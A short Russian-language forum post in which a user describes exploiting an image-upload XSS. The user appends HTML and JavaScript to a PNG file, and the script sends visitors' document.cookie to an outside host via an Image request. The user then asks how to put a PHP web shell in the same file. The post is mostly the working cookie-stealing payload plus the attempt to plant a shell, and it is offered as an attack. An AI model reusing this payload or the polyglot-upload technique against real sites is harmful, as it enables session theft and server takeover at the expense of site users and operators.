18.03.2008, 00:53
|
|
Новичок
Регистрация: 07.05.2007
Сообщений: 12
С нами:
10006438
Репутация:
1
|
|
нашел xss на сайте залив картинку png c таким содержанием
Код:
‰PNG � IHDR � ��� ��Д‰ �sRGB ®О�й �gAMA ±Џьa� cHRM z& Ђ„ ъ Ђи u0 к` :˜ �pњєQ< pHYs � �� љњ� IDAT�Wcш�� ы�э+Х�E IEND®B`‚�<html> <script>alert(/by_blabla_/)</script><script>img = new Image(); img.src = "http://s.netsec.ru/absent09.gif?"+document.cookie;</script> </html> z& Ђ„ ъ Ђи u0 к` :˜ �pњєQ< pHYs � �� љњ� IDAT�Wcш�� ы�э+Х�E IEND®B`‚
напрашивается вопрос можно ли вставить шелл вместо <html> <script>alert(/by_blabal_/)</script><script>img = new Image(); img.src = "http://s.netsec.ru/absent09.gif?"+document.cookie;</script> </html> ?
я вставляю вместо этого код шелла а когда запускаю такое чувство будто php не работает =( |
|
|